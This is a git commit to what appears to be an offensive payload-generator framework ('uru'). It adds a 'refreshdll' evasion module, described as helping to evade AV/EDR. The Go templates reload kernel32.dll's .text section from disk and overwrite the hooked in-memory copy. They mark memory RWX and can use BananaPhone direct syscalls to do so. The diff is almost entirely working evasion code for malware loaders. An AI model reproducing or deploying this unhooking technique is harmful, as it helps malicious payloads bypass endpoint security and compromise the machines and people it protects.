Add evasion RefreshDll

guervild · guervild · commit 476cfd6aedc9 · 2022-06-07T13:25:30.000+02:00
Signed-off-by: guervild &lt;11190755+guervild@users.noreply.github.com&gt;
diff --git a/README.md b/README.md
@@ -202,6 +202,7 @@ Evasions are the modules that help you to evade AV/EDR:
 | selfdelete     | Delete the current binary during runtime | None | |
 | sleep          | Sleep during a fixed amount of time in seconds. | Delay: the amount of time to sleep, default is 5s | |
 | createmutex    | Create a mutex with a specific name. | MutexName: the name of the mutex, default is "UruMutex" | |
+| refreshdll     | Refresh the given dll to remove hook by using the dll on disk. (Inspired by sliver/scarecrow and TimWhitez works). | UseBanana: UseBananaPhone to perform syscall. Default is "false", DllName: Name of the dll to refresh. Default is "C:\\\\Windows\\\\System32\\\\kernel32.dll". | Only work if windows version is "10.0" |
 
 
 
diff --git a/data/templates/evasions/refreshdll/functions.go.tmpl b/data/templates/evasions/refreshdll/functions.go.tmpl
@@ -0,0 +1,144 @@
+func refreshDll(dllname string) (error) {
+	osVersion := windows.RtlGetVersion()
+	currentVersion := fmt.Sprintf("%d.%d", osVersion.MajorVersion, osVersion.MinorVersion)
+	{{ if .Debug }}
+	printDebug("info", "Current windows version is %s", currentVersion)
+	{{end}}
+
+	if currentVersion != "10.0" {
+		{{ if .Debug }}
+		printDebug("info", "Current windows version is different from 10.0")
+		{{end}}
+		return fmt.Errorf("Windows version is not supported for refreshing dll")
+	}
+
+	{{ if .Debug }}
+	printDebug("info","Reloading dll %s", dllname)
+	{{end}}
+	
+	df, e := ioutil.ReadFile(dllname)
+	if e != nil {
+		return e
+	}
+
+	f, e := pe.Open(dllname)
+	if e != nil {
+		return e
+	}
+
+	x := f.Section(string([]byte{'.', 't', 'e', 'x', 't'}))
+	ddf := df[x.Offset:x.Size]
+	return writeGoodBytes(ddf, dllname, x.VirtualAddress, x.Name, x.VirtualSize)
+}
+
+func writeGoodBytes(b []byte, pn string, virtualoffset uint32, secname string, vsize uint32) error {
+	t, e := windows.LoadDLL(pn)
+	if e != nil {
+		return e
+	}
+	h := t.Handle
+	dllBase := uintptr(h)
+
+	dllOffset := uint(dllBase) + uint(virtualoffset)
+
+	{{ if eq .UseBanana "false" }}
+
+	var old uint32
+	e = windows.VirtualProtect(uintptr(dllOffset), uintptr(len(b)), windows.PAGE_EXECUTE_READWRITE, &old)
+	if e != nil {
+		return e
+	}
+
+	{{ if .Debug }}
+	printDebug("info", "Made memory map RWX")
+	{{end}}
+
+	for i := 0; i < len(b); i++ {
+		loc := uintptr(dllOffset + uint(i))
+		mem := (*[1]byte)(unsafe.Pointer(loc))
+		(*mem)[0] = b[i]
+	}
+
+	{{if .Debug}}
+	printDebug("info", "DLL overwritten")
+	{{end}}
+	e = windows.VirtualProtect(uintptr(dllOffset), uintptr(len(b)), old, &old)
+	if e != nil {
+		return e
+	}
+	{{if .Debug}}
+	printDebug("info", "Restored memory map permissions")
+	{{end}}
+
+	{{else}}
+	{{if .Debug}}
+	printDebug("info", "Refresh dll will use bananaphone to perform syscall")
+	{{end}}
+
+	var thisThread = uintptr(0xffffffffffffffff)
+	var old uint32
+	sizet := len(b)
+	
+	bp, e := bananaphone.NewBananaPhone(bananaphone.AutoBananaPhoneMode)
+	if e != nil {
+		panic(e)
+	}
+	//resolve the functions and extract the syscalls
+	write, e := bp.GetSysID("ZwWriteVirtualMemory")
+	if e != nil {
+		panic(e)
+	}
+
+	protect, e := bp.GetSysID("NtProtectVirtualMemory")
+	if e != nil {
+		panic(e)
+	}
+
+	_, r := bananaphone.Syscall(
+		protect,
+		uintptr(thisThread),
+		uintptr((unsafe.Pointer(&dllOffset))),
+		uintptr((unsafe.Pointer(&sizet))),
+		windows.PAGE_EXECUTE_READWRITE,
+		uintptr((unsafe.Pointer(&old))),
+	)
+	if r != nil {
+		return r
+	}
+	{{ if .Debug }}
+	printDebug("info", "Made memory map RWX")
+	{{end}}
+
+	_, r = bananaphone.Syscall(
+		write, //NtWriteVirtualMemory
+		uintptr(thisThread),
+		uintptr(dllOffset),
+		uintptr(unsafe.Pointer(&b[0])),
+		uintptr(len(b)),
+		0,
+	)
+	if r != nil {
+		return r
+	}
+	{{if .Debug}}
+	printDebug("info", "DLL overwritten")
+	{{end}}
+
+		_, r = bananaphone.Syscall(
+		protect,
+		uintptr(thisThread),
+		uintptr((unsafe.Pointer(&dllOffset))),
+		uintptr((unsafe.Pointer(&sizet))),
+		uintptr(old),
+		uintptr(unsafe.Pointer(&old)),
+	)
+	if r != nil {
+		return r
+	}
+	{{if .Debug}}
+	printDebug("info", "Restored memory map permissions")
+	{{end}}
+	{{end}}
+
+	return nil
+}
diff --git a/data/templates/evasions/refreshdll/instanciation.go.tmpl b/data/templates/evasions/refreshdll/instanciation.go.tmpl
@@ -0,0 +1,8 @@
+errRefreshDll_{{.SubNameError}} := refreshDll("{{ .DllName }}")
+
+if errRefreshDll_{{.SubNameError}} != nil {
+	{{if .Debug}}
+	printDebug("error","Error while refreshing dll {{ .DllName }}: %s", errRefreshDll_{{.SubNameError}})
+	printDebug("error","Continue...")
+	{{end}}
+}
diff --git a/pkg/evasion/evasion.go b/pkg/evasion/evasion.go
@@ -46,5 +46,10 @@ func GetEvasion(evasionType string) (models.ObjectModel, error) {
 		return NewCreateMutexEvasion(), nil
 	}
 
+	
+	if evasionType == "refreshdll" {
+		return NewRefreshDllEvasion(), nil
+	}
+
 	return nil, fmt.Errorf("Wrong evasion type passed: evasion %s is unknown", evasionType)
 }
diff --git a/pkg/evasion/refresh-dll.go b/pkg/evasion/refresh-dll.go
@@ -0,0 +1,59 @@
+package evasion
+
+import (
+	"embed"
+	"strings"
+
+	"github.com/guervild/uru/pkg/common"
+	"github.com/guervild/uru/pkg/models"
+)
+
+type RefreshDllEvasion struct {
+	Name         string
+	Description  string
+	DllName 	 string
+	UseBanana    string
+	SubNameError string
+	Debug        bool
+}
+
+func NewRefreshDllEvasion() models.ObjectModel {
+	return &RefreshDllEvasion{
+		Name: "RefreshDll",
+		Description: `Refresh the given dll to remove hook by using the dll on disk. (Inspired by sliver/scarecrow and TomWhitez works).
+  Argument(s):
+    UseBanana: UseBananaPhone to perform syscall. Default is "false".
+	DllName: Name of the dll to refresh. Default is "C:\\\\Windows\\\\System32\\\\kernel32.dll".`,
+		UseBanana: "false",
+		DllName: "C:\\\\Windows\\\\System32\\\\kernel32.dll",
+		Debug:     false,
+		SubNameError:   common.RandomStringOnlyChar(5),
+	}
+}
+
+func (e *RefreshDllEvasion) GetImports() []string {
+
+	imports := []string{
+		`"debug/pe"`,
+		`"io/ioutil"`,
+		`"fmt"`,
+		`"unsafe"`,
+		`"golang.org/x/sys/windows"`,
+	}
+
+	if strings.ToLower(e.UseBanana) == "true" {
+		imports = append(imports, `bananaphone "github.com/C-Sto/BananaPhone/pkg/BananaPhone"`)
+	}
+
+	return imports
+}
+
+func (e *RefreshDllEvasion) RenderInstanciationCode(data embed.FS) (string, error) {
+
+	return common.CommonRendering(data, "templates/evasions/refreshdll/instanciation.go.tmpl", e)
+}
+
+func (e *RefreshDllEvasion) RenderFunctionCode(data embed.FS) (string, error) {
+
+	return common.CommonRendering(data, "templates/evasions/refreshdll/functions.go.tmpl", e)
+}

Original file line number	Diff line number	Diff line change
`@@ -46,5 +46,10 @@ func GetEvasion(evasionType string) (models.ObjectModel, error) {`
`46`	`46`	`return NewCreateMutexEvasion(), nil`
`47`	`47`	`}`
`48`	`48`
	`49`	`+`
	`50`	`+ if evasionType == "refreshdll" {`
	`51`	`+ return NewRefreshDllEvasion(), nil`
	`52`	`+ }`
	`53`	`+`
`49`	`54`	`return nil, fmt.Errorf("Wrong evasion type passed: evasion %s is unknown", evasionType)`
`50`	`55`	`}`